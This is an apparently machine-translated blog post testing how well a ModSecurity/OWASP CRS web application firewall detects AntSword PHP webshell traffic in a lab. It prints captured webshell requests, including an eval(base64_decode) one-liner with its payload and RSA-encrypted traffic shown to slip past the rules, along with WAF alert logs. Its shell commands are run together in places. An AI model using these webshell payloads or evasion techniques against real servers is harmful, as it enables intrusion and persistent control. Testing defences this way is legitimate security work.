Shulou(Shulou.com)05/31 Report--

Today, I will tell you how WAF analyzes the performance of WebShell traffic detection. The content of the article is good. Now I would like to share it with you. Friends who feel in need can understand it. I hope it will be helpful to you. Let's read it along with the editor's ideas.

Local environment building

From the retained screenshot, the php version of the other party is 5.6.40, so I'm going to build a test environment for apache+php5.6.40. Open virtualbox, link to copy a centos mirror system, and configure it again according to the following process.

1. Install apache

Yum install-y httpdhttpd-vServer version: Apache/2.4.6 (CentOS) Server built: Aug 8 2019 11:41:18

two。 Install php5.6

Yum-y install epel-releaserpm-Uvh https://mirror.webtatic.com/yum/el7/webtatic-release.rpmyum-y install php56w php56w-mysql php56w-gd libjpeg* php56w-ldap php56w-odbc php56w-pear php56w-xml php56w-xmlrpc php56w-mbstring php56w-bcmath yum-y install httpd php-gd56w php-intl56w php-mysql56w mod_ssl openssl mcrypt php5-mcrypt56wyum-y install php56w-mcrypt php56w-soap php56w-intl php56w-pdosystemctl restart httpd.servicephp-vPHP 5.6.40 (cli) (built: Jan 12 2019 13 : 11:15) Copyright (c) 1997-2016 The PHP Group

Make an index.php to display phpinfo (), and turn off firewalld for testing convenience when accessing this machine.

Systemctl stop firewalld / / of course, you can also open the port through firewall-cmd.

3. In order to check the attack traffic later, install a wireshark, including wireshark-gnome, etc., and directly replace it with *.

Yum install wireshark*

4. The configuration apache-modsecurity does not have a waf device on hand, so it is impossible to test the traffic, so it is tested with mode-security and CRS, the core rule set of OWASP (Open Web Application Security Project). Although the effect is not as intuitive as the actual scenario, it is illustrative enough.

Yum-y install mod_securitycd / etc/httpdgit clone https://github.com/SpiderLabs/owasp-modsecurity- crs.gitmv owasp-modsecurity-crs modsecurity.dcd modsecurity-crscp crs-setup.conf.example crs-setup.confvi / etc/httpd/conf/httpd.confInclude conf.modules.d/*.confInclude modsecurity.d/owasp-modsecurity-crs/crs-setup.confInclude modsecurity.d/owasp-modsecurity-crs/rules/*.confsystemctl restart httpd

The default configuration of modsecurity is to detect that an attack will be blocked, so we change it to log-only.

Vim / etc/httpd/conf.d/mod_security.confSecRuleEngine On (intercept) SecRuleEngine DetectionOnly record tail-f / var/log/httpd/model/modsec_audit.log / / View the intercept log

Testing some attack vectors will see a record in log to prove that the configuration is complete. The environment has been built.

Configure, analyze, and detect plaintext php-webshell configuration for attack traffic

First of all, write a sentence to see the plaintext webshell traffic transmission.

Vim test1.php

Configure ant swords to connect

Plaintext flow analysis

Use wireshark to view the traffic of the test connection

POST / test1.php HTTP/1.1Host: 192.168.1.13Accept-Encoding: gzip, deflateUser-Agent: antSword/v2.1Content-Type: application/x-www-form-urlencodedContent-Length: 993Connection: closeaaaa=@ini_set ("display_errors", "0"); @ set_time_limit (0); function asenc ($out) {return $out;}; function asoutput () {$output=ob_get_contents (); ob_end_clean (); echo "620e2fc"; echo @ asenc ($output); echo "71a0ccfbc1" } ob_start (); try {$D=dirname ($_ SERVER ["SCRIPT_FILENAME"] / / dirname () function gets the directory portion of the given file path, while the $_ SERVER ['SCRIPT_FILENAME'] global predefined variable is used to get the full path of the currently executed script); if ($SCRIPT_FILENAME = ") $D=dirname ($_ SERVER [" PATH_TRANSLATED "]) / / if you don't get it, use PATH_TRANSLATED to get the basic path of the file system where the current script resides (not the document root). This is the result after the server makes a virtual image to the real path. Apache 2 users can use AcceptPathInfo On in httpd.conf to define PATH_INFO. R = "{$D}"; if (substr ($DPJ 0Power1)! = "/") {foreach (range ("C", "Z") as $L) if (is_dir ("{$L}:")) $R.= "{$L}:";} else {$R.= "/";} $R.= "" / / above is to determine the windows or linux drive letter, and then store the obtained directory information in the variable $u = (function_exists ("posix_getegid"))? @ posix_getpwuid (@ posix_geteuid ()): "; / / posix_getegid () returns the current process's valid user group ID,posix_geteuid () returns the current process's valid user ID$s= ($u)? $u [" name "]: @ get_current_user () / / get_current_user () method to get PHP current script owner name $R.=php_uname (); / / php_uname returns information about the system running PHP $R. = "{$s}"; echo $R * *;} catch (Exception $e) {echo "ERROR://". $e-> getMessage ();}; asoutput (); die () / output HTTP/1.1 200 OKDate: Wed, 29 Jan 2020 12:53:30 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40X-Powered-By: PHP/5.6.40Content-Length: 136Connection: closeContent-Type: text/html; charset=UTF-8620e2fc/var/www/html./.Linux localhost.localdomain 3.10.0-1062.9.1.el7.x86_64 # 1 SMP Fri Dec 6 15:49:49 UTC 2019 x86_64.apache71a0ccfbc1

In order to have a better understanding of the traffic package sent by antsword, I carefully looked at the package and checked some related functions. While making comments, I sighed the power of the PHP function, and aroused my curiosity, and did a local test on these functions.

Base64&&rot13 traffic analysis POST / php_assert_script.php HTTP/1.1Host: 192.168.1.13Accept-Encoding: gzip, deflateUser-Agent: antSword/v2.1Content-Type: application/x-www-form-urlencodedContent-Length: 942Connection: closeant=%40eval (% 40base64_decode (% 24_POST%5Bq9c4fa426fb243%5D))% 3B&q9c4fa426fb243=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuICRvdXQ7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiMzRhZTE3IjtlY2hvIEBhc2VuYygkb3V0cHV0KTtlY2hvICI1YmJhN2YiO31vYl9zdGFydCgpO3RyeXskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfQkiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkMiLCJaIilhcyAkTClpZihpc19kaXIoInskTH06IikpJFIuPSJ7JEx9OiI7fWVsc2V7JFIuPSIvIjt9JFIuPSIJIjskdT0oZnVuY3Rpb25fZXhpc3RzKCJwb3NpeF9nZXRlZ2lkIikpP0Bwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKToiIjskcz0oJHUpPyR1WyJuYW1lIl06QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIJeyRzfSI7ZWNobyAkUjs7fWNhdGNoKEV4Y2VwdGlvbiAkZSl7ZWNobyAiRVJST1I6Ly8iLiRlLT5nZXRNZXNzYWdlKCk7fTthc291dHB1dCgpO2RpZSgpOw%3D%3D

The traffic encrypted by base64 will not contain at least so many high-risk functions except eval. We will test it again after encryption.

Base64&&rot13 webshell traffic detection

The waf test results are as follows:

Message: Warning. Pattern match "^ [\\ d.] + $" at REQUEST_HEADERS:Host. [file Message: Warning. Matched phrase "base64_decode" at ARGS:ant. [file "/ etc/httpd/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "301"] [id "933150"] [msg "PHP Injection Attack: High-Risk PHP Function Name Found"] [data "Matched Data: base64_decode found within ARGS:ant: @ eval (@ base64_decode ($_ post431d0730c])) [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"].

The statistics are as follows

Number of Apache-ErrorMessage matching rules level77143

Configure rot13 encryption and decryption through the Antsword interface, grab the packet and take a look at the traffic, but only change the encryption function of base64 into str_rot13

Ant=%40eval (% 40base64_decode-> ant=%40eval (% 40str_rot13 (

The intercepted data is similar to base, and the waf statistics are as follows

Number of Apache-ErrorMessage matching rules level107143

Thus it can be seen that functions such as eval and base64,rot13 under symmetric encryption algorithm can also trigger higher alarm levels. However, compared with plaintext transmission, the alarm will be triggered by half, so the author further tries the asymmetric encryption algorithm provided by antsword.

RSA encrypted traffic configuration

Since version > = 2.1.0, the Antsword author has added the RSA schema. Ant Jian only supports PHP by default. In addition, Server is required to open the php_openssl extension.

Modify php.ini, remove the comments before extension=php_openssl.dll, and restart Apache

How to use it:

Antsword- > system Settings-> Encoding Management-> New Encoder-> PHP RSA- > name rsa_php- > Click RSA configuration-> generate

1. Copy the following php code to the virtual machine and name it rsa.php.

2. Configure antsword connection type and select rsa_php

3. Test the connection

Analysis of RSA encrypted Traffic

Post the traffic captured by wireshark

POST / rsa.php HTTP/1.1

Host: 192.168.1.13

Accept-Encoding: gzip, deflate

User-Agent: antSword/v2.1

Content-Type: application/x-www-form-urlencoded

Content-Length: 1712

Connection: close

Ant=W%2B9beN7Ltke390bzZGS5JbOBCnO8SRXW6Z8w0WaMF6CdAymaCu6NeWE9FX0kyCFs3jaLkDWkEvcTsSC2gEu85l5ugsVJUK6bTWFlVNeRBoezjTjUJZdjGvnjrxjd5Pn4iZaRjoaxAZPeZP2ozupbevWFUId4ZzkKZ7bIVPrZKk4%3D%7CYjt1kz5Gkj2N6Ajkqp3VXcg%2FEA7emPXV6oyTwZAZS9Ux1%2Fpby5PIuU9LsMZmGlMqGXvRFO23is9MUJpF66yboIAIYqpGRJCDgSP4S%2BfG6DD0lRYGEOIEsfpaLSVMhxZtR6OnFXp%2FfbXqmgGUk0a8HCUfQ83XmXS%2BRsl0Yx2PFc4%3D%7CAWtIrpychlQENib6basrK89LJcjnKk%2Bf5mVM72MOnPHxaviQFXws2TKNdGPI4SI9%2Fkwl%2FUGqB22s6NOwCza1f%2BkzGK7FqEciITMZMNFbokFsmjG8IiWkRO%2B%2BbWWnsMesfavJub9aEln41x8U97WjgKGKMMdqXZHrIRS4KU8pQhU%3D%7CXLL0DnlWOLx3hNXd2VGzmbdcgmtQoiyiiPNQCiBkAbUK1mLM14l6f22Pkl2tSSw%2F9dYIkdZ91wUok9GHDBMmKkL6D%2BJGQxrJDyQXEfytOzfzZmKqp%2BJ%2BryVm2zwLJMXTdpZ%2BUsBWgVzlD%2Bxga6%2F7rCqkG%2FtaWM6e%2BGegcS4lWTE%3D%7CJGJR50q4jSkL028qffvT%2Be%2BnJcMQth7jz86sntyuI3GZQUtjS5%2FoCByIqsGi8zPwCKS0J%2FAEiEGhAwN7%2FBQXYjyVWAs5VpDhPrVUs7EbqFgllVmrNt8T5Rt7O%2FCHVSiR2AQjyG%2BxB1LjO5ElX%2FH8Pfh35dDpVaFt3MEr1lxT69I%3D%7CSIirF52ZEhs%2FMBfco2kWouurB%2F%2FhCvLG29%2BK70a6t8Io%2FE%2F7VL5IO38s2j%2Bjq%2BSw6dUDL9cEUbEx2G2U4r0fHiDSYPbbn9WS6FbQSCPHxG6lxLHCXmmkKxj%2B2P8khyMM%2FHdVCWai%2B5L5hXYr%2BUWFkCkbv%2BUyYUSsfL29sGxWeVA%3D%7Ci1qZBSL6Dfu31cisSj3J%2BY7epLuQl62DdEWMCiZRQOz5AHFsPFsWtO59uedRC0CfMOhcbIDGGq2GNThL8VPz%2FUfLJTd3kuoFo7p225iPcYOKJS75V36ccHw3bMI3LOWcEhUF3LPX2YcaLSvwDDyHfrnWL2Qj6VmQKew8edoAIdU%3D%7CkJih4pPT70J6BiPll9o4PtH%2Byl% 2BmB8%2BUPDAS%2FfAu4uzi2yDMCIdzdkaFLlnsUKewHXLf1mWWVpGkfqLCttgZed9wUtl6N22C3nQGZqZ%2FqnNiKeBYK0%2FJBmimOAf7nSMB1WF%2Bab5RmRq6cSSwrWc4ya93kVJzmIg1BdyaiycdN5I%3D%7CHV2y7vs6wQUIQ8DnvveCeD8xtjRecf%2F%2B7rAl7Y4Wa8S4Y0onKYHOz2Nz0hgBJtFN%2BLRIj9%2B%2FYyOq%2Fslq0XW%2BolQCUl5hf8%2F3Y9OmlxKvSCGf3A0IIAquqSaJXpU4w8rqVyP9Od2bgDXDzsOx8YgVdigeyZxLS0TNNODTGIATb7Y%3DHTTP/1.1 200 OK

Date: Thu, 30 Jan 2020 05:47:09 GMT

Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40

X-Powered-By: PHP/5.6.40

Content-Length: 133

Connection: close

Content-Type: text/html; charset=UTF-8

8ee773/var/www/html./.Linux localhost.localdomain 3.10.0-1062.9.1.el7.x86_64 # 1 SMP Fri Dec 6 15:49:49 UTC 2019 x86_64.apache47970246

After the asymmetric encryption algorithm, the data transmitted by the whole traffic can not be distinguished by the naked eye except length. The author is satisfied with this effect.

RSA encrypted traffic detection Message: Warning. Pattern match "^ [\\ d.] + $" at REQUEST_HEADERS:Host. [file "/ etc/httpd/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "708"] [id "920350"] [msg "Host header is a numeric IP address"] [data "192.168.1.13"] [severity "WARNING"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"]

Apache-Handler: php5-script

Stopwatch: 1580363229118571 7666 (-)

Stopwatch3: 1580363229118571 7666; combined=6153, p114474, p21405170, p34039, p400156, p500213, sr=205, sw=1, lumb0, gc=0

Response-Body-Transformed: Dechunked

Producer: ModSecurity for Apache/2.9.2 (http://www.modsecurity.org/); OWASP_CRS/3.2.0.

Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40

Engine-Mode: "DETECTION_ONLY" | Apache-Error | Message | number of matching rules | level |

|-|

| | 1 | 1 | 1 |-| |

Waf can only detect Host header is a numeric IP address, which basically means that waf has little protection against webshell traffic encrypted by RSA, and future security device testing can only rely on antivirus software.

This degree of encryption is enough for the author in this experiment. But there are also many problems, such as bypass soft, confusing code and so on, each direction needs to be focused, careful, long-term investment.

The above is the whole content of WAF's performance analysis of WebShell traffic detection, and more content related to WAF's performance analysis of WebShell traffic detection can search the previous articles or browse the following articles to learn ha! I believe the editor will add more knowledge to you. I hope you can support it!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.